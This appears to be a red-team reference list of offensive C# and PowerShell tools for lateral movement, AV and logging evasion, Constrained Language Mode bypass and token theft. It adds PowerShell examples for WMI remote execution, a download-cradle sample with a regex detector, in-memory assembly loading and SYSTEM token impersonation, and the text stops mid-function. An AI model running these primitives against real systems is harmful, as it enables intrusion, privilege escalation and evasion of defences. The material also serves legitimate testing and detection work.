SprayAD
- This tool can help Red and Blue teams to audit Active Directory user accounts for weak, well-known or easily guessable passwords and can help Blue teams to assess whether these events are properly logged and acted upon. When this tool is executed, it generates event IDs 4771 (Kerberos pre-authentication failed) instead of 4625 (logon failure). This event is not audited by default on domain controllers and therefore this tool might help evade detection while password spraying.
-
Lateral Movement
- Multiple
- .NET Remoting
-
DCOM
-
SharpCOM
- SharpCOM is a c# port of Invoke-DCOM
-
SharpExcel4-DCOM
- Port of Invoke-Excel4DCOM
-
MSSQL
-
Lateral movement via MSSQL: a tale of CLR and socket reuse - Juan Manuel Fernandez, Pablo Martínez
- Recently, our Red Team had to deal with a restricted scenario, where all traffic from the DMZ to the main network was blocked, except for connections to specific services like databases and some web applications. In this article, we will explain how we overcame the situation, covering the technical details. We also introduce mssqlproxy, a tool for turning a Microsoft SQL Server into a socks proxy.
-

RDP

Articles/Blogposts/Writeups

Tools
- SharpRDP
  - Blogpost
  - Remote Desktop Protocol .NET console application for authenticated command execution.
- SharpDoor
  - SharpDoor is an alternative to RDPWrap, written in C#, that enables multiple concurrent RDP sessions by patching termsrv.dll. An OPSEC caveat: SharpDoor currently still uses cmd.exe to run sc and impersonate TrustedInstaller; avoiding cmd.exe is planned. Currently only Windows 10 is supported.

Registry
- SCShell
  - Fileless lateral movement tool that relies on ChangeServiceConfigA to run commands.

SMB
- CSExec
  - An example of how to implement psexec (from the Sysinternals suite) functionality in open-source C#. It does not implement all of psexec's functionality, but it is equivalent to running: psexec -s \\target-host cmd.exe
- SharpInvoke-SMBExec
  - A native C# conversion of Kevin Robertson's Invoke-SMBExec PowerShell script.

WinRM
- CSharp-WinRM
  - .NET 4.0 WinRM API command execution.

WMI
- SharpWMI
  - SharpWMI is a C# implementation of various WMI functionality: local/remote WMI queries, remote process creation through Win32_Process, and remote execution of arbitrary VBS through WMI event subscriptions. Alternate credentials are supported for the remote methods.
- SharpInvoke-WMIExec
  - A native C# conversion of Kevin Robertson's Invoke-WMIExec PowerShell script.
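The Win32_Process.Create primitive that SharpWMI and Invoke-WMIExec build on, written in PowerShell as an added example (not the code of either tool). It opens a CIM session with alternate credentials over DCOM (the transport classic WMI uses: TCP 135 followed by an ephemeral port), calls Create, and maps the documented return codes so "access denied" is not mistaken for "target unreachable". Host name, credential and command line are placeholders.

```powershell
function Invoke-WmiProcess {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$CommandLine,
        [pscredential]$Credential,                                   # alternate credentials, optional
        [ValidateSet('Dcom','Wsman')][string]$Protocol = 'Dcom'      # Dcom = classic WMI; Wsman = WinRM (5985/5986)
    )
    $sessArgs = @{ ComputerName = $ComputerName; SessionOption = (New-CimSessionOption -Protocol $Protocol) }
    if ($Credential) { $sessArgs.Credential = $Credential }
    $session = New-CimSession @sessArgs
    try {
        $r = Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create `
                              -Arguments @{ CommandLine = $CommandLine }
        # Return values documented for Win32_Process.Create
        $codes = @{ 0 = 'Success'; 2 = 'Access denied'; 3 = 'Insufficient privilege';
                    8 = 'Unknown failure'; 9 = 'Path not found'; 21 = 'Invalid parameter' }
        [pscustomobject]@{
            Target    = $ComputerName
            ProcessId = $r.ProcessId
            Result    = $codes[[int]$r.ReturnValue]
        }
    } finally {
        Remove-CimSession $session
    }
}

# On the target the new process is a child of WmiPrvSE.exe, which is the parent/child pair
# that 4688 and Sysmon event 1 based detections for this technique key on.
$cred = Get-Credential 'CORP\svc_admin'
Invoke-WmiProcess -ComputerName 'srv01.corp.local' -Credential $cred `
    -CommandLine 'cmd.exe /c whoami > C:\Windows\Temp\who.txt'
```

Create returns immediately with the PID; it gives no output channel, which is why the tools above either write to a file and read it back over SMB, or move to event subscriptions.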

Evasion

Articles/Blogposts/Writeups

Talks/Presentations/Videos

Tools
- tvasion
  - Anti-virus evasion based on changing the file signature via AES encryption, with PowerShell and C# AV evasion templates. Supports executable and PowerShell payloads with Windows executable, PowerShell or batch output. Developed with PowerShell on Linux for Windows targets.
- AVIator
  - Antivirus evasion project.
- PEunion
  - PEunion bundles multiple executables (or any other file type) into a single file. Each file can be configured individually to be compressed, encrypted, etc. In addition, a URL can be provided for a download to be executed. The resulting binary is compiled from dynamically generated C# code. No resources are exposed that can be harvested with tools like Resource Hacker, and PEunion does not use managed resources either: files are stored in byte[] code definitions, and once encryption and compression are applied they are as obscure as they can get.
- Self-Morphing C# Binary
  - C# binary that mutates its own code and encrypts and obfuscates itself at runtime.
- Inception-Framework
  - Inception provides in-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
- SharpLoadImage
  - Hide a .NET assembly inside PNG images.
- BlockETW
  - .NET assembly to block ETW telemetry in the current process.
- SharpPack
  - Blogpost
  - SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary .NET and PowerShell tools.

Script Repos/Good Stuff
- GhostPack
- SharpSploit
  - SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.
- Sharp-Suite
  - FuzzySecurity: 'My musings with C#'
- OffensiveCSharp-matterpreter
  - This is a collection of C# tooling and PoCs I've created for use on operations. Each project is designed to use no external libraries. Open each project's .sln in Visual Studio and compile as "Release".
- bytecode-api
  - C# library with common classes, extensions and additional features on top of the .NET Framework. BytecodeApi implements lots of extensions and classes for general-purpose use. In addition, specific classes implement more complex logic for both general app development and WPF apps. In particular, boilerplate code that is known to be part of any core DLL in a C# project is likely to be already here. In fact, I use this library in many of my own projects. For this reason, each class and method has been reviewed numerous times. BytecodeApi is highly consistent, particularly in terms of structure, naming conventions, patterns, etc. The entire code style resembles the patterns used in the .NET Framework itself. You will find it intuitive to understand.
- OutlookToolbox
  - Blogpost
  - OutlookToolbox is a C# DLL that uses COM to interact with Outlook. Also included is a Cobalt Strike aggressor script that uses OutlookToolbox.dll to give it a graphical and control interface.
- OffensiveDLR
  - Toolbox containing research notes & PoC code for weaponizing .NET's DLR.
- RedTeamCSharpScripts - Mr-Un1k0d3r
- CSharpScripts - Arno0x
- Named Pipes
  - A proof of concept / pattern for a client/server communication model using named pipes in C#. In this example, a client passes a message to the server over a named pipe, which the server executes as a command. Standard output and standard error are redirected back to the client over the named pipe and printed to the terminal.

Utilities

Compression
- MiddleOut
  - Compresses files from the command line; works with Cobalt Strike's execute-assembly.

Files
- FileWriter
  - .NET project for writing files to local or remote hosts.
- LockLess
  - LockLess is a C# tool for enumerating open file handles and copying locked files.

Scheduled Tasks
- Creating Scheduled Tasks (C#) - StackOverflow
- Creating a Task Using NewWorkItem Example - docs.ms
- SharpTask
  - SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCE/RPC process as schtasks.exe: the connection opens on TCP port 135 and is followed by an ephemeral TCP port. This code is compatible with Cobalt Strike.

Powershell Things

101
- Why I Choose PowerShell as an Attack Platform - @mattifestation(2012)
- The PowerSploit Manifesto - @mattifestation(2015)
- PowerShell is Not Special - An Offensive PowerShell Retrospective - @mattifestation(2017)
- APTs ❤️ PowerShell, You Should Too - Anthony Rose, Jake Krasnov(Defcon Safe Mode RTV)
  - Quite often, you may have heard people mention, "Why should you bother learning PowerShell, isn't it dead?" or "Why not just use C#?" Many individuals in the offensive security field have a common misconception that PowerShell is obsolete for red team operations. Meanwhile, it remains one of the primary attack vectors employed by Advanced Persistent Threats (APTs). APTs are known for implementing sophisticated hacking tactics, techniques, and procedures (TTPs) to gain access to a system for an extended period of time. Their actions typically focus on high-value targets, which leave potentially crippling consequences to both nation-states and corporations. It is crucial that Red Teams accurately emulate real-world threats and do not ignore viable attack options. For this talk, we will walk through how many threat actors adapt and employ PowerShell tools. Our discussion begins with examining how script block logging and AMSI are powerful anti-offensive PowerShell measures. However, the implementation of script block logging places a technical burden on organizations to conduct auditing on a substantial amount of data, while AMSI is trivial to bypass for any capable adversary. Finally, we will demonstrate APT-like PowerShell techniques that remain incredibly effective against the latest generation of network defenses.

Learning

Articles/Blogposts/Writeups
- PowerShell 101 - Carlos Perez
- Get-Help: An Intro to PowerShell and How to Use it for Evil - Jared Haight
- Brosec
  - Brosec is a terminal-based reference utility designed to help infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used in infosec work. One of Brosec's most popular use cases is generating reverse shells (python, perl, powershell, etc.) on the fly and copying them to the clipboard.

Talks/Presentations/Videos
- PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility - Satoshi Tanda(CodeBlueTokyo2017)
  - Slides
  - Code
  - This talk will discuss how to gain greater visibility into managed program execution, especially for PowerShell, using a .NET native code hooking technique to help organizations protect themselves from such advanced attacker techniques. In this session, we will demonstrate how to enhance the capabilities provided by AMSI and how to overcome its limitations, through a realistic implementation of the technique, all while analyzing the internals of the .NET Framework and the PowerShell engine.
- Defensive Coding Strategies for a High-Security Environment - Matt Graeber - PowerShell Conference EU 2017
  - How sure are you that your PowerShell code is prepared to handle anything that a user might throw at it? What if the user was an attacker attempting to circumvent security controls by exploiting a vulnerability in your script? This may sound unrealistic, but this is a legitimate concern of the PowerShell team when including PowerShell code in the operating system. In a high-security environment where strict AppLocker or Device Guard rules are deployed, PowerShell exposes a large attack surface that can be used to circumvent security controls. While constrained language mode goes a long way in preventing malicious PowerShell code from executing, attackers will seek out vulnerabilities in trusted signed code in order to circumvent security controls. This talk will cover numerous different ways in which attackers can influence the execution of your code in unanticipated ways. A thorough discussion of mitigations against such attacks will then follow.
- APTs LOVE PowerShell and Why You Should Too - Anthony Rose & Jake Krasnov(Defcon28RedTeamVillage)
  - Same talk as listed under 101 above; see the abstract there.

Articles/Blogposts/Writeups
- File Parsing
- Logging

Discovery

AD
- Powersploit-PowerView
  - PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which use PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
- PowerShell-AD-Recon
  - AD PowerShell recon scripts.
- PowEnum
  - PowEnum executes common PowerSploit PowerView functions and combines the output into a spreadsheet for easy analysis. All network traffic is sent only to the DC(s). PowEnum also leverages PowerSploit's Get-GPPPassword and harmj0y's ASREPRoast.

Files
- SessionGopher
  - SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
- CC_Checker
  - CC_Checker cracks credit card hashes with PowerShell.

LocalHost
- PowerView
- HostRecon

Memory & Processes
- Powershell Live-Memory Analysis Tools: Dump-Memory, Dump-Strings, Check-MemoryProtection - @mattifestation(2012)
- Invoke-ProcessScan
  - Gives context to a system. Uses the EQGRP Shadow Brokers leaked list to attach descriptions to processes.

SQLite
- PSSQLite PowerShell Module
  - PowerShell module to query SQLite databases.

WebBrowser
- BrowserGather
  - Fileless extraction of sensitive browser information with PowerShell. This project includes cmdlets for extracting credential, history, and cookie/session data from the three most popular web browsers (Chrome, Firefox, and IE). The goal is to perform this extraction entirely in memory, without touching the victim's disk. Currently Chrome credential and cookie extraction is supported.
-
Execution
-
Articles/Blogposts/Writeups
- Meterpreter New Windows PowerShell Extension - Carlos Perez(2016)
-
Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight(Derbycon206)
- PS>Attack is a custom tool that was created to make it easier for Penetration Testers to incorporate PowerShell into their bag of tricks. It combines a lot of the best offensive tools from the offensive PowerShell community into a custom, encrypted console that emulates a PowerShell environment. It also includes a custom command, "Get-Attack" to act a search engine for attacks making it easy to find the right attack for any situation. In this presentation we will cover how PowerShell can be used during every part of a penetration test and how PS>Attack can help make the whole process a lot easier.
-
Tools
-
Invoke-ReflectivePEInjection.ps1
- This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process.
- Managing Privileges using PoshPrivilege - Boe Prox(2015)
-
Invoke-ReflectivePEInjection.ps1
-

Add-Type & Reflection

101
- Add-Type - docs.ms
  - Adds a Microsoft .NET class to a PowerShell session.
- Add-Type - SS64
- Add-Type vs. [reflection.assembly] in PowerShell - Tim Curwick(2013)
- Using Add-Type in a PowerShell script that is run as a Scheduled Task - Craig Tolley(2016)

Constrained-Language Mode

101
- About Language Modes - docs.ms
  - Explains language modes and their effect on PowerShell sessions.
- PowerShell Constrained Language Mode - PowerShell Team(2017)
- A Comparison of Shell and Scripting Language Security - PowerShell Team
Articles/Blogposts/Writeups
- AppLocker CLM Bypass via COM - MDSec
- Detecting and Preventing PowerShell Downgrade Attacks - Lee Holmes(2017)
- Simple Bypass for PowerShell Constrained Language Mode - DaveHardy20(2017)
- Powershell Constrained Language Mode ByPass - @spottheplanet
- Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode - @mattifestation(2017)
- A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests - enigma0x3(2017)
- Pentesting and .hta (bypass PowerShell Constrained Language Mode) - Josh Graham(2018)
- Bypassing Applocker and Powershell constrained language mode - DarthSidious
- Powershell CLM Bypass Using Runspaces - Shaksham Jaiswal(2019)

Talks/Presentations/Videos

Tools
- DotNetToJScript Constrained/Restricted LanguageMode Breakout
  - This repository is based on a post by @xpn (details linked there). Xpn's post outlines a bug of sorts where ConstrainedLanguage, when enforced through AppLocker, does not prevent COM invocation. Because of this it is possible to define a custom COM object in the registry and force PowerShell to load a DLL; on load it is possible to change the LanguageMode to FullLanguage and break out of the restricted shell. This repo is a variation on that technique where a DotNetToJScript scriptlet is used to stage a .NET assembly directly into the PowerShell process.
- PoSH_Bypass
  - PoSHBypass is a payload and console proof of concept that allows an attacker, or for that matter a legitimate user, to bypass PowerShell's Constrained Language Mode, AMSI, and ScriptBlock and Module logging. The bulk of this concept is the combination of 3 separate pieces of research; I've stuck these 3 elements together as my first attempt at a non-'Hello World!' C# project.
- PSByPassCLM
  - Bypass for PowerShell Constrained Language Mode.
- powershellveryless
  - Constrained Language Mode + AMSI bypass all in one (currently blocked without modification).
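What CLM actually blocks is easier to see than to read about. The following is an added example, not code from any of the tools or posts above: it opens an in-process runspace whose InitialSessionState is forced into ConstrainedLanguage, runs a handful of probes in it, and repeats them in a FullLanguage runspace for contrast. It also illustrates the caveat behind the "CLM bypass using runspaces" post: a runspace created in-process inherits only a system-wide lockdown (AppLocker/WDAC policy or the `__PSLockdownPolicy` environment variable), not a language mode that was set by hand on the calling session via `$ExecutionContext.SessionState.LanguageMode`. Conversely, on a host that is under a real lockdown the "FullLanguage" run below comes out constrained too, which is itself a useful check.

```powershell
function Test-LanguageModeProbes {
    param(
        [System.Management.Automation.PSLanguageMode]$LanguageMode = 'ConstrainedLanguage'
    )
    # Each probe returns a string on success or raises the CLM error it is meant to trigger.
    $probes = [ordered]@{
        'Core cmdlet (Get-Date)'            = { Get-Date | Out-Null; 'allowed' }
        'Allowed core type ([string])'      = { [string]::Join(',', 'a', 'b') }
        'Arbitrary .NET type ([Math])'      = { [Math]::Sqrt(16) }
        'Add-Type (compile C#)'             = { Add-Type -TypeDefinition 'public class ClmProbe {}'; 'allowed' }
        'New-Object System.Net.WebClient'   = { New-Object System.Net.WebClient | Out-Null; 'allowed' }
    }

    $iss = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
    $iss.LanguageMode = $LanguageMode          # ignored in favour of ConstrainedLanguage if a system lockdown is enforced
    $rs = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspace($iss)
    $rs.Open()
    try {
        foreach ($name in $probes.Keys) {
            $ps = [System.Management.Automation.PowerShell]::Create()
            $ps.Runspace = $rs
            [void]$ps.AddScript($probes[$name].ToString())
            try {
                $out = $ps.Invoke()
                $result = if ($ps.HadErrors) { 'BLOCKED: ' + $ps.Streams.Error[0].FullyQualifiedErrorId }
                          else { 'ok (' + ($out -join ',') + ')' }
            } catch {
                # CLM violations surface as terminating errors wrapped by Invoke()
                $e = $_.Exception
                if ($e.InnerException) { $e = $e.InnerException }
                $result = 'BLOCKED: ' + $e.Message
            } finally { $ps.Dispose() }
            [pscustomobject]@{ Mode = $LanguageMode; Probe = $name; Result = $result }
        }
    } finally { $rs.Dispose() }
}

Test-LanguageModeProbes -LanguageMode ConstrainedLanguage | Format-Table -AutoSize
Test-LanguageModeProbes -LanguageMode FullLanguage        | Format-Table -AutoSize
```

Cmdlets and the core types still work under CLM; arbitrary type access, Add-Type and New-Object on non-core types do not, which is why the bypasses listed above go through trusted signed code, COM, or a fresh runspace rather than through the language itself.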

C# in PS

Articles/Blogposts/Writeups
- Weekend Scripter: Run C# Code from Within PowerShell - Dr Scripto(2013)
- Using CSharp (C#) code in Powershell scripts - Stefan Gobner(2010)
- PowerShell – .NET Scripting how to ? - audministrator
- Executing C# code using PowerShell script - Adam Furmanek(2016)
- Use .Net Code (C#) and DLLs in Powershell - Hannes Hayashi(2016)
- Powershell: How do you add inline C#? - Dot Jim(2018)
- Add-Type - docs.ms
  - Adds a Microsoft .NET class to a PowerShell session.
- Add-Type - SS64
- Add-Type vs. [reflection.assembly] in PowerShell - Tim Curwick(2013)
- Using Add-Type in a PowerShell script that is run as a Scheduled Task - Craig Tolley(2016)

Calling Unmanaged Code from Managed Code (P/Invoke)
- Native interoperability - docs.ms
  - "The following articles show the various ways of doing "native interoperability" in .NET."
- Platform Invoke (P/Invoke) - docs.ms
- Platform Invocation Services - Wikipedia
- How to: Call Native DLLs from Managed Code Using PInvoke - docs.ms
  - Functions implemented in unmanaged DLLs can be called from managed code using Platform Invoke (P/Invoke). If the source code for the DLL is not available, P/Invoke is the only option for interoperating. Unlike other .NET languages, Visual C++ provides an alternative to P/Invoke; see Using C++ Interop (Implicit PInvoke).
- pinvoke
  - A library containing all P/Invoke code so you don't have to import it every time. Maintained and updated to support the latest Windows OS.

Download Cradles
- Dropping Executables with Powershell - @mattifestation(2011)
- PowerShell: In-Memory Injection Using CertUtil.exe - mov a, xbx(2018)
  - In this blog post I will discuss the steps to use PowerShell, Invoke-CradleCrafter and Microsoft's Certutil.exe to craft a payload and one-liner that can be used to evade the latest version of Windows Defender (as of this writing), as well as tips for not getting caught by Intrusion Detection Systems and behavior analysis.
- Invoke-CradleCrafter - Daniel Bohannon
  - PowerShell remote download cradle generator & obfuscator.

Execution Policy
- 15 Ways to Bypass the PowerShell Execution Policy - NetSPI

Tools
- Bat Armor
  - Bypass PowerShell execution policy by encoding a PS script into a .bat file.
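The two mechanics the cradle and execution-policy entries above rest on, as an added example that is not Bat Armor's or Invoke-CradleCrafter's code. `ConvertTo-EncodedCommand` produces the `-EncodedCommand` form that .bat wrappers and one-liners use to sidestep execution policy (the usual gotcha: the payload is UTF-16LE before Base64, not UTF-8), `ConvertFrom-EncodedCommand` reverses it from a captured process command line, and `Find-CradleIndicators` scores the result for the download-cradle primitives and host-hiding switches an analyst looks for. The command lines and the 198.51.100.10 address at the bottom are constructed samples.

```powershell
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # powershell.exe accepts any unique prefix: -e, -ec, -enc, -encodedcommand all work.
    # -ex/-ep (ExecutionPolicy) must not match, so the optional part is 'c' or 'n...'.
    if ($CommandLine -notmatch '(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)') { return $null }
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
}

function Find-CradleIndicators {
    param([Parameter(Mandatory)][string]$Text)
    $patterns = [ordered]@{
        'Net.WebClient download'        = '(?i)Net\.WebClient|DownloadString|DownloadFile'
        'Invoke-WebRequest/RestMethod'  = '(?i)Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b'
        'Invoke-Expression of content'  = '(?i)\biex\b|Invoke-Expression'
        'BITS transfer'                 = '(?i)Start-BitsTransfer|bitsadmin'
        'certutil decode/urlcache'      = '(?i)certutil(\.exe)?\s.*-(decode|urlcache)'
        'COM/XML HTTP cradle'           = '(?i)Msxml2\.XMLHTTP|WinHttp\.WinHttpRequest|InternetExplorer\.Application'
        'Hidden/non-interactive host'   = '(?i)-w[a-z]*\s+hidden|-nop\b|-noni\b'
        'Execution policy override'     = '(?i)-e[px][a-z]*\s+(bypass|unrestricted)'
        'Encoded command'               = '(?i)\s-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{20,}'
    }
    foreach ($k in $patterns.Keys) { if ($Text -match $patterns[$k]) { $k } }
}

# Constructed sample payload and command lines (as they would appear in 4688 / Sysmon 1 CommandLine fields).
$script = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage.ps1')"
$enc    = ConvertTo-EncodedCommand $script
$samples = @(
    "powershell.exe -nop -w hidden -enc $enc",
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1',
    "cmd.exe /c powershell -e $enc"
)
foreach ($cl in $samples) {
    $decoded = ConvertFrom-EncodedCommand $cl
    $scan    = if ($decoded) { "$cl $decoded" } else { $cl }    # score the wrapper and the payload together
    [pscustomobject]@{
        Encoded    = [bool]$decoded
        Indicators = (Find-CradleIndicators $scan) -join '; '
        Payload    = if ($decoded) { $decoded } else { '(plain)' }
    }
}
```

The second sample shows why execution policy is not a security boundary: `-ExecutionPolicy Bypass` is a supported switch, and the script it runs never needs to be encoded at all. Decode first, then score, or the cradle hides inside the Base64 blob.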

In-Memory

Articles/Blogposts/Writeups
- PowerSyringe - PowerShell-based Code/DLL Injection Utility - @mattifestation(2011)
- In-Memory Managed Dll Loading With PowerShell - @mattifestation(2012)
- Surgical .NET Dissection - Using PowerShell Proxy Functions to Extend Get-Member - @mattifestation
- Deep Reflection - Defining Structs and Enums in PowerShell - @mattifestation(2012)
- Accessing the Windows API in PowerShell via internal .NET methods and reflection - @mattifestation(2012)
- Working with Unmanaged Callback Functions in PowerShell - @mattifestation(2013)
  - With a little bit of work, you can bind a scriptblock to an unmanaged callback function in PowerShell. The key to accomplishing this is casting a scriptblock as a non-generic delegate that has the function signature of the desired callback function. Fortunately, creating non-generic delegates is made easy with my Get-DelegateType function.
- Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates - @mattifestation(2013)
  - It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.
- PowerShell – Run a .Net Assembly DLL from in Memory - audministrator(2014)
- PowerShell – Run Assembly that is not registered in the GAC - audministrator(2014)
- PowerShell load .Net Assembly - PsCustomObject(2019)
  - One common technique is loading .NET assemblies in a PowerShell script or module to leverage functionality otherwise not available natively in PowerShell. There are multiple methods we can use to add assemblies to PowerShell, which we explore in the post.
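The in-memory load the posts above describe, as an added example that is not taken from any of them: a small executable assembly is built once, read as bytes, and then loaded and run purely from that byte array with `[System.Reflection.Assembly]::Load([byte[]])` (no LoadFile/LoadFrom and no path at run time), which is the same shape as execute-assembly in a C2. In an operation the bytes arrive over the channel; here a throwaway assembly is compiled locally and deleted so the example is self-contained. The demo class and its output string are assumptions of this example.

```powershell
function New-DemoAssemblyBytes {
    # Build a throwaway assembly with a static Main and return its raw bytes.
    $src = @'
public static class Demo {
    public static int Main(string[] args) {
        System.Console.WriteLine("Hello from memory: " + string.Join(" ", args));
        return args.Length;
    }
}
'@
    $path = Join-Path ([IO.Path]::GetTempPath()) ("demo_{0}.dll" -f [guid]::NewGuid())
    Add-Type -TypeDefinition $src -OutputAssembly $path -OutputType ConsoleApplication
    try     { [IO.File]::ReadAllBytes($path) }
    finally { Remove-Item $path -ErrorAction SilentlyContinue }
}

function Invoke-AssemblyFromBytes {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [string[]]$Arguments = @()
    )
    # Load straight from memory; the loader never sees a file, so $asm.Location is empty.
    $asm = [System.Reflection.Assembly]::Load($Bytes)
    if (-not $asm.EntryPoint) { throw 'Assembly has no entry point (not an executable assembly).' }
    # Main(string[]) takes ONE parameter; wrap the array so PowerShell does not unroll it.
    $rc = $asm.EntryPoint.Invoke($null, @(, $Arguments))
    [pscustomobject]@{
        Assembly   = $asm.GetName().Name
        Location   = $asm.Location            # '' for byte-loaded assemblies
        ReturnCode = $rc
    }
}

$bytes = New-DemoAssemblyBytes
Invoke-AssemblyFromBytes -Bytes $bytes -Arguments 'alpha', 'beta'
```

Two operational notes that follow from the code: the assembly stays loaded in the process for its lifetime (there is no unload in .NET Framework), and because `Location` is empty, any defensive tooling that enumerates loaded modules by path will not list it; ETW .NET runtime events and AMSI's assembly-load scanning are what see it.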

Nishang
- Nishang
  - Nishang is a framework and collection of scripts and payloads that enables the use of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of a penetration test.
- Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss! - serenity-networks.com

Powershell without Powershell

Articles/Blogposts/Writeups
- Empire without PowerShell.exe
- Powershell without Powershell to bypass app whitelist
- We don't need powershell.exe - decoder.cloud
- PowerShell: In-Memory Injection Using CertUtil.exe
- Run PowerShell without Powershell.exe — Best tools & techniques - Bank Security
- PowerOPS: PowerShell for Offensive Operations
- The Evolution of Offensive PowerShell Invocation - Lee Christensen

Talks & Presentations

Tools
- AwesomerShell
  - Talk
  - This is the awesomershell application code that was presented with the Gray Hat PowerShell talk.
- OffensivePowerShellTasking
  - Run multiple PowerShell scripts concurrently in different app domains. Solves the offensive security problem of running multiple PowerShell scripts concurrently without spawning powershell.exe and without the scripts interfering with each other (usually due to P/Invoked functions).
- PowerLessShell
  - PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
- NoPowerShell
  - NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative use case for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll,main
- p0wnedShell
  - p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET).
- UnmanagedPowerShell
- nps - Not PowerShell
  - Execute PowerShell without powershell.exe.
- PSShell
  - PSShell is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It doesn't need to be "installed", so it is very portable.
- PowerShdll
  - Run PowerShell with rundll32. Bypasses software restrictions.
- PowerOPS
  - PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of post-exploitation easier.
- PowerLine
  - Presentation
  - Running into environments where the use of PowerShell is being monitored or is just flat-out disabled? Have you tried out the fantastic PowerOps framework but are wishing you could use something similar via Meterpreter, Empire, or other C2 channels? Look no further! In this talk, Brian Fehrman talks about his new PowerLine framework. He overviews the tool, walks you through how to use it, shows you how you can add additional PowerShell scripts with little effort, and demonstrates just how powerful (all pun intended) this little program can be!

Through LoLBins

Reflection

Reflective DLL Injection
- Reflective DLL Injection with PowerShell - clymb3r(2013)
- Invoke-DllInjection.ps1 - PowerSploit
  - Injects a DLL into the process ID of your choosing.
- PowerPwning: Post-Exploiting By Overpowering PowerShell - Joe Bialek(Defcon21)

Reflective PE Injection
- Invoke-ReflectivePEInjection.ps1 - PowerSploit
  - This script has two modes: it can reflectively load a DLL/EXE into the PowerShell process, or it can reflectively load a DLL into a remote process.
- Reflective PE Injection In Windows 10 1909 - HUBBL3(2020)

Registry

Running Shellcode
- Invoke-Shellcode.ps1 - PowerSploit
  - Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.

Runspaces

Token Manipulation

101
- Use PowerShell to Duplicate Process Tokens via P/Invoke - Dr Scripto(2012)
  - "Summary: Guest blogger Niklas Goude shows how to use P/Invoke to duplicate process tokens from LSASS to elevate privileges."
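The same P/Invoke route the post above takes, as an added example rather than Niklas Goude's code: open a SYSTEM-owned process, duplicate its primary token as an impersonation token, and impersonate it on the current thread for the duration of a scriptblock. It needs an elevated session (SeDebugPrivilege is what lets an administrator open processes owned by SYSTEM, and `Process.EnterDebugMode()` enables it). winlogon.exe is used as the source rather than LSASS because it is normally not a protected process; the choice is an assumption of this example, and the numeric constants are the Win32 values from the SDK headers.

```powershell
$tokenApi = Add-Type -Namespace Win32 -Name Token -PassThru -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes,
    int ImpersonationLevel, int TokenType, out IntPtr phNewToken);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool RevertToSelf();
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@

function Invoke-TokenImpersonation {
    param(
        [Parameter(Mandatory)][int]$ProcessId,
        [Parameter(Mandatory)][scriptblock]$ScriptBlock    # runs while impersonating
    )
    $PROCESS_QUERY_INFORMATION = 0x0400
    $TOKEN_DUPLICATE           = 0x0002
    $TOKEN_QUERY               = 0x0008
    $MAXIMUM_ALLOWED           = 0x02000000
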